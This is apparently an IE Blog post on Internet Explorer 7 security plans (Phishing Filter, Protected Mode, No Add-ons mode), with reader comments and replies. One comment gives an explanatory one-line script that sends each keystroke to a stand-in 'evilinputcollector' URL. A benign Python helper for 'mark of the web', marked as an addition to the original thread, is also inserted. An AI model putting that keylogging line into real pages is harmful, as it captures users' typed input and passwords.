Security strategy for IE7: Beta 1 overview, Beta 2 preview

Security as a feature can be hard to measure. I
want to provide some insight into our security strategy so our customers and
partners can understand the direction we’re heading with Beta 1 and beyond to
Beta 2. All of the work the IE security team has done for IE7 is designed to
make you safer while you browse. Some of our work is front and center, like
the Phishing Filter, but a lot of the features are “under the hood”, like
Low-rights IE. We hope you will never see them; just know that they are
there protecting you.

We started out designing the new security changes
for IE7 by understanding the risks or the "threats" that browsers
face from a malicious web site. “Threat modeling”, as we call it, is one part
of the Security Development Lifecycle and is really like performing a risk
evaluation to find, and then eliminate or mitigate, security threats in
software.

We found places where we can enhance security by
changing parts of IE’s architecture. Beta 1 includes powerful but mostly
invisible changes to how IE handles URLs and script in sensitive functions.
Those changes will continue forward in Beta 2 but we have established a major
beachhead in Beta 1 against these classes of vulnerabilities. You’ll be hearing
about these in posts coming soon from Eric and myself (Marc would post but he’s
on his honeymoon somewhere in the Caribbean). You may have already read some
about how Internet Explorer for Windows Vista will run in a new “Protected Mode”
(formerly known as Low-rights IE) to help prevent malware from installing on a
user’s system through a vulnerability.

Powerful add-ons like ActiveX controls are part
of what make browsing such a rich experience but any extensibility can also
introduce threats to browser security. In IE7 Beta 1, you’ll be able to use IE
in “No Add-ons” mode. In Beta 2 we’ll continue to enhance the user interface
for “Manage Add-ons” to make it easy for users to be in control of Add-ons. We
know that our user base depends on the rich scenarios that they get with
Add-ons. Our goal is to help users take control of important decisions while
maintaining a rich, consistent, easy-to-use experience.

There’s also a threat that a malicious web site
will try to trick you into letting it do something dangerous. The most
upsetting example of this is the recent epidemic scam-tactic known as “phishing”.
The scam usually starts with a bogus email that urges the victim to visit a
fake banking site. After the victim visits the site and enters their password,
the site uses it to steal money from the victim’s account. Tariq from my team
will be telling you about how we built a Phishing Filter to fight back against
this threat. The Phishing Filter will be able to take you away from a reported
phishing site but, even if a site hasn’t been reported yet, Internet Explorer
will warn you about sites that might look a “little bit phishy” because they
use some features commonly used on phishing sites. We want your feedback on how
the Phishing Filter performs and Tariq will tell you how to submit feedback
directly through the UI. We’ve also made it easier to check the lock icon for
legitimate banking and secure sites. Eric will tell you more about that. We’ll
continue to improve the user interface in Beta 2 with additional features to
make security decisions easier.

We believe that security is never done but that
we can make a huge difference in this release. We’re proud that we get to
tackle these threats head-on in IE7. We’re hoping for lots of feedback from the
security and developer communities - we want to make sure IE7 is rock solid. As
always, if you find a vulnerability, please report it responsibly; this helps
protect the other people like you working with us on this beta.

- Rob Franco

Comments

  • Anonymous
    January 01, 2003
    The IE Blog is on a roll!

    Some very cool stuff is talked about, mainly security in Internet Explorer...

  • Anonymous
    January 01, 2003
    “little bit phishy” -- I hope you keep that exact phrase when warning the user!

    / ATTENTION!
    / ! Microsoft Internet Explorer
    ----- believes this page to be
    a little bit phishy! Do not
    trust it!

  • Anonymous
    January 01, 2003
    "we hope you will never see them, just know that they are there protecting you."

    So, big brother is there, you just can't see him...

    Honestly I think this is a bad idea. When you have 90% of people using your operating system and provided software (IE), you have a huge responsibility. Dumbing down the features or making them hard to find isn't helping anyone in the long-term. 85% of those users who use your software often are complete computer novices. They have no idea what "phishing" is and why your software tries to prevent it. The best route is to either put all of the features into a neatly arranged menu or leave it like it is and provide a very user-friendly help file.

  • Anonymous
    January 01, 2003
    If security really is a concern, then please, please, PLEASE make it so the phishing detector does not "phone home" to Microsoft. The second I read that that is how it works, I turned it off - and I can assure you that many others will too. My browsing is nobody's business. Microsoft has no reason to be notified of the sites I visit and I'm sure this will be the general consensus among users. To be honest, there really is no difference between this and spyware. Many spyware claim to be providing security and enhancement features, many spyware claim to not sell your information, but how do we know? For all I know, Microsoft will be selling my browsing history to marketing companies. Therefore, I turned the phishing detection off. I'd rather have a "possible" security breach by being baited to a bad site, rather than a "definite" security breach by sending my information to MS.

  • Anonymous
    January 01, 2003
    Speaking of security, will windows update work in Beta 2?

  • Anonymous
    January 01, 2003
    The "phone home" thing is indeed too evil, no matter how good your purposes are. Nobody is going to like it.

    The Right Thing (tm) IMO would be to include that functionality in Microsoft Spyware - a database (updated frequently) with all the "evil sites" so IE knows what it has to block.

  • Anonymous
    January 01, 2003
    Codemastr: we take security and privacy to heart in all our features. Tariq will blog more details about the anti-phishing work we're doing later, but to answer your basic question: just like many Microsoft products (Windows Media Player, Windows Messenger, etc.) it is currently our plan to allow users to opt in or out of any feature that "phones home." The point of our Beta programs is to get feedback, so if you think we should change the defaults, etc., let us know what you think they should change to, and why!

    -Christopher [MSFT]

  • Anonymous
    January 01, 2003
    Jack, what I mean by "you'll never see them" is that some security improvements are infrastructure improvements and users won't need to "find them" as you suggest. For example, there won't be any UI for the architectural improvements to URL and script handling.
    More visible are features like the Phishing Filter and the interface for seeing SSL information. Your feedback here is dead-on: we want the UI for these features to be useful for every user. We have done usability testing on these features but the feedback on the beta will be important for us to get usability right.
    Rob [MSFT]

  • Anonymous
    January 01, 2003
    codemastr, you're right that the Phishing Filter checks a Microsoft server for known phishing sites. The reason it needs to check with a server is that phishing attacks move around very quickly and the list of phishing sites has to be constantly updated. Automatically using the server lookup helps protect you automatically but you can also set the phishing filter to work manually. If you set phishing filter to work manually, you can control exactly when IE checks the server. As I just mentioned above, we need to make sure that users understand the UI for the phishing filter, the decision to use it and how to disable it if they choose. We'll go into a lot more detail about how this works in a post all about the Phishing Filter.

    Rob [MSFT]

  • Anonymous
    January 01, 2003
    I agree wholeheartedly with codemastr and Diego. A local database for the phishing filter is the way to go.

    Allowing users to opt-out of a server lookup simply mutes the effectiveness of this feature. It does nothing to address several good objections already raised here -- objections which would be met quite sufficiently by a local database.

  • Anonymous
    January 01, 2003
    Nice work on the redesign of the site - nice and clean.

  • Anonymous
    January 01, 2003
    I don't have a problem with it "phoning home" personally. I'm not exactly sure how a local database would even work... would it sync up every few hours or so? It might be difficult to keep the local copy relevant and up to date without forcing people to download too often. Also, I'm not sure how the current anti-phishing works (as I'm not an MSDN subscriber), but there's a lot to be said for more intelligent algorithms for detecting phishing attacks in addition to site checking.

  • Anonymous
    January 01, 2003
    How does Low-Rights IE compare to simply running exe file with "Run as..." option using locked-down user account? Does Windows XP allow some uncontrollable privilege escalation of such programs? (through dll, or something?)

  • Anonymous
    January 01, 2003
    IE7 security changes: Rob Franco of Microsoft provides guidance on some of the security work being done in IE7. The first beta, now in private release, adds additional constraints on some uses of URLs and browser scripts. Rob also describes...

  • Anonymous
    January 01, 2003
    I've already come across a couple of sites that IE7 beta 1 has reported as being 'phishy'

    One was on xbox.com (eek!) and the other I can't remember now. I tried to submit both as "not suspicious" but apparently "The Passport network is experiencing technical difficulties"

    I'll try again soon. And keep up the good work.

  • Anonymous
    January 01, 2003
    This is great news - absolutely. But if you take security so seriously, why are there so many unpatched security vulnerabilities in Internet Explorer? I would prefer getting these problems fixed before adding new security features ...

  • Anonymous
    January 01, 2003
    @MSFT people: Is there a similar Vista blog to this? As you can see blogging about next Microsoft products and activities brings a lot of attention and feedback. I think it would be great to have a general Vista blog (such as this one) for the same purpose.
    You should tell your boss about this :)

    Anyway, that's my 2 cents. Keep up the good work and happy honeymoon to Marc :)

  • Anonymous
    January 01, 2003
    One other thing: are you planning on exposing a public anti-phishing web service? It seems to me, working with everybody else, instead of locking it into Internet Explorer only, will share the work to maintain this database amongst many people, not leave it all up to you.

  • Anonymous
    January 01, 2003
    Great Blog and I really like the (new) openness of the IE-Team!

    Just one question: When can we expect the open beta of IE 7? I would like to try IE 7 too ;)

  • Anonymous
    January 01, 2003
    The feasibility of hashing urls depends entirely on the implementation though Will, if MS have implemented this as a huge database of exact urls that they just do a string comparison against, hashing would work fine..

    Either way, I don't see it happening as I'm sure the marketing/search/advertising departments are loving the idea of having browsing statistics reported to them.. cynical perhaps but I doubt I'm wrong

  • Anonymous
    January 01, 2003
    I have to say that I always thought the text "requires restart", meant a full on Windows restart. Is it really only a browser restart that this text refers to? If so, could I suggest a slight change in the wording, for clarification - such as "requires browser restart".

  • Anonymous
    January 01, 2003
    Chris: If so, could I suggest a slight change in the wording, for clarification - such as "requires browser restart".

    Or better yet, fix it so that you don't have to restart anything! :)

  • Anonymous
    January 01, 2003
    Is there any chance Beta 2 or final will allow total customization of every toolbar position? I myself prefer the File menu below the title bar.

    How about a confirmation (enabled by default and can be disabled) before closing multiple tabs?

    Nice work otherwise, looking forward to final.

  • Anonymous
    January 01, 2003
    WinXP/SP2 - Could this be called "Security Strategy"?!

    Dear Rob Franco and all in the IETeam,

    It seems to me that in WinXP/SP2 almost any HTML document ( including those residing in the local machine ) with Script is, by default, blocked and labeled as "potentially dangerous"!!! This simply can not be called "security strategy"!!! This is rather an indication of a deep equivocation and, in fact, of a frank incapacity to distinguish between really malicious Scripts and well-intentioned and task-oriented ones. I simply can not understand why people do not feel them intellectually offended with such a detestable and incredible thing...

    Microsoft, wake up while there is time!!!

  • Anonymous
    January 01, 2003
    <<"requires browser restart". >>

    A good idea, although we're tight on space.

    <<Or better yet, fix it so that you don't have to restart anything!>>

    The problem there is that many of these settings really cannot be changed while the browser is running, because certain codepaths have already been executed. For instance, it doesn't really work to change "Enable 3rd party browser extensions" while the browser is running, because the extensions have already been loaded. Forcing unload would be equivalent to killing processes in Task manager.

    Overall, the expectation is that Advanced Settings are not often changed. If you find you're constantly switching one of these settings on and off, please let me know which one. Thanks!

  • Anonymous
    January 01, 2003
    I'm reading an interesting article about the subject: http://spaces.msn.com/members/eswanson/Blog/cns!1pdVO89fmNKwqmwfervd6IGg!964.entry.

    What does the IE Team think about it?
    Will IE 7.0 prevent this vulnerability?

  • Anonymous
    January 01, 2003
    I wrote about the evil script detection problem here:

    http://blogs.msdn.com/ptorr/archive/2005/08/05/448007.aspx

  • Anonymous
    January 01, 2003
    Is it just me, or does HTML Help (chm) no longer work once IE7 is installed? The help files for several programs I use just return about:blank.

  • Anonymous
    January 01, 2003
    Well didn't take you long to fix the Windows Update problem - good work.

    Thomas

  • Anonymous
    January 01, 2003
    The issue that a server can look at your keystrokes when you type in the webpage has nothing to do with Ajax, although Ajax is one way of accomplishing the attack (see Google Suggest, for instance).

    If you have script enabled at all, you can perform this attack without using XMLHttp. You can simply do something like

    <body onkeypress="someimagetag.src='http://mysite.com/evilinputcollector.aspx?key='+window.event.keyCode;">

    And whammo, there you go.

  • Anonymous
    January 01, 2003
    2 EricLaw:

    Thanks, for your response. I had another question now (or suggestion):

    In IE Security Settings, I may enable/disable/prompt: Active scripting, Allow paste operation via script, Allow status bar updates via script. But I can't control sending information to server via script (without user interaction).

    Allow user to take a decision about this action (enable/disable/prompt - more than enough).

    What do you think?

  • Anonymous
    January 01, 2003
    The refresh button on IE is way too small, and it's out of the way. Maybe most users use the F5 key or something, but please make that button a little bigger.

  • Anonymous
    January 01, 2003
    Jack, I'll tackle a few of your questions:

    2) You asked about “No Add-ons mode” and possibly confusing the user. “No Add-ons mode” is currently intended as an advanced tool users might use in case of emergency. You are absolutely correct that not confusing users with it is critical.
    2a) Yes, you can use Windows Update in No Add-ons Mode, in fact No Add-ons mode has a special start page with a link to Windows Update. Getting a security update is one scenario when we expect people might want No Add-ons mode.
    2b) “No Add-ons mode” is a whole separate way to run IE, it's not applied based on zone of the page you are visiting.
    3) I hear your feedback about the Phishing Filter. We’re working to earn and maintain your trust. More from Tariq soon.
    4,5,6 & 7) I hear you saying that silent download of ActiveX controls is a “threat” in any zone. Specifically, you might be talking about a scenario where a user lowers their security slider to “Low” and they get ActiveX controls installed on their machine. I agree, I think this is the kind of mistake that some folks make. I look forward to telling you more about how we’re improving the security UI in Beta 2 as soon as possible.


    KL, You asked about Low-rights IE compared to starting IE using “Run as…” a different user. That scenario is in fact conceptually similar to “Protected Mode” (formerly Low-rights IE) because it prevents IE from writing to certain sections of the file system. We’ll give you more details about Protected Mode as soon as possible.


    Marcus, you asked why XP SP2 puts the information bar on innocent HTML pages. First off, I'm glad to hear you aren't writing malicious pages! Since the HTML you write is "good", you might not need all the power granted to HTML in the Local Machine Zone. By moving your HTML to another zone, you reduce its capability but you also will avoid getting the Information Bar.

    You can change the zone of a local HTML file to a less powerful zone simply by adding an HTML comment, called "mark of the web", that indicates the security zone you want to run in. This is a little extra effort for you but if your HTML doesn’t need that extra power, this is a safe choice. Here’s more info on Mark of the Web:

    http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml/overview/motw.asp

    As you know, you can still use powerful HTML in the Local Machine Zone by clicking on the information bar or by using one of the other workarounds for Local Machine Zone Lockdown:

    http://msdn.microsoft.com/security/productinfo/XPSP2/securebrowsing/lockdown_devimp.aspx

    Thanks folks for all of the feedback and good questions!
    Rob [MSFT]
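
The "mark of the web" edit described in Rob's reply above, as an added Python example (not part of the original thread and not Microsoft code): it builds the comment in the `<!-- saved from url=(NNNN)URL -->` form, where NNNN is the URL's length as four digits, checks an existing mark, and inserts one after the DOCTYPE. The function names, the sample page and the choice to flag a length mismatch are assumptions of this example.

```python
import re

# Mark of the Web (MOTW): <!-- saved from url=(NNNN)URL -->
# NNNN is the length of URL written as four decimal digits.
MOTW_RE = re.compile(r"<!--\s*saved from url=\((\d{4})\)(\S+?)\s*-->", re.IGNORECASE)
DOCTYPE_RE = re.compile(r"\s*<!DOCTYPE[^>]*>", re.IGNORECASE)


def build_motw(url="about:internet"):
    """Return the MOTW comment for url; about:internet selects the Internet zone."""
    # Whitespace or "--" would break the comment syntax, so refuse such URLs.
    if not url or len(url) > 9999 or re.search(r"\s|--", url):
        raise ValueError("URL cannot be written as a mark of the web: %r" % url)
    return "<!-- saved from url=(%04d)%s -->" % (len(url), url)


def check_motw(html):
    """Return (status, url) with status 'missing', 'bad-length' or 'ok'."""
    m = MOTW_RE.search(html)
    if m is None:
        return ("missing", None)
    declared, url = int(m.group(1)), m.group(2)
    # Flagging a mismatch is this example's policy (assumption): the declared
    # length is meant to equal the length of the URL that follows it.
    return ("ok" if declared == len(url) else "bad-length", url)


def add_motw(html, url="about:internet"):
    """Give a local HTML document a valid mark; a valid existing mark is kept."""
    status, _ = check_motw(html)
    if status == "ok":
        return html
    mark = build_motw(url)
    if status == "bad-length":
        # Replace the malformed mark in place (lambda avoids escape handling).
        return MOTW_RE.sub(lambda _m: mark, html, count=1)
    m = DOCTYPE_RE.match(html)
    if m:
        # Keep the DOCTYPE first and put the mark on the next line.
        return html[:m.end()] + "\r\n" + mark + html[m.end():]
    return mark + "\r\n" + html


# Constructed sample: a local page with script and no mark of the web.
SAMPLE = ("<!DOCTYPE html>\n<html><body>"
          "<script>document.title = 'report';</script></body></html>\n")

if __name__ == "__main__":
    print(check_motw(SAMPLE))
    print(add_motw(SAMPLE))
```
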

  • Anonymous
    January 01, 2003
    Are there any plans to implement something similar to Shane Hird's suggestion?

    http://www.securityfocus.com/archive/1/391803

  • Anonymous
    January 01, 2003
    Internet Explorer 7 includes a new URL handling architecture known internally as CURI. The new...

  • Anonymous
    January 01, 2003
    Where can I try this out as our students on campus are bound to integrate this w/out our knowledge and I am sure I will need to "tech" it kmackles (the @) uh.edu

  • Anonymous
    January 01, 2003
    My last post was intended to introduce our overall security strategy and the specific features in IE7...

  • Anonymous
    January 01, 2003
    Hi, my name is Tariq Sharif and I am a Program Manager on the IE Security team. One of the threats users...

  • Anonymous
    March 15, 2006
    As we’ve described previously, we’ve made some major architectural improvements to improve browsing...

  • Anonymous
    March 17, 2006
    While Rob Franco and Chris Wilson were presenting and getting feedback at PDC, I spent most of my time...

  • Anonymous
    March 17, 2006
    Hello, I’m Marc Silbey, a Program Manager focused on IE security. I’m back from my honeymoon and...
